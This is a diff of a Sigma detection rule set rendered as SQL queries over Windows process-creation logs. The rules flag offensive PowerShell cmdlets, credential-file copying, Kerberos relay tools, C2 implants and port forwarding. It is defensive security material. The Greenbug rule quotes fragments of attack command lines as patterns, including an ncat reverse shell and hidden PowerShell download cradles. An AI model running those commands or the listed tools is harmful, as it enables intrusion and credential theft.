CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wevtutil_recon.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Always Install Elevated Windows Installer", - "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", - "status": "experimental", - "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "System administrator usage", - "Anti virus products" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%msi%' ESCAPE '\\' AND NewProcessName LIKE '%tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Unusual Parent Process For Cmd.EXE", - "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", - "status": "experimental", - "description": "Detects suspicious parent process for cmd.exe", - "author": "Tim Rauch", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_unusual_parent.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Run Once Task Execution as Configured in Registry", - "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "This rule detects the execution of Run Once task as configured in the registry", - "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_runonce_execution.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "File Encoded To Base64 Via Certutil.EXE", - "id": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", - "status": "test", - "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "status": "test", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "File Deletion Via Del", + "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_cmd_del_execution.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.t1557.001" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.g0049", "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", + "attack.t1059", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'ftp.exe' AND NOT (NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "status": "test", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": 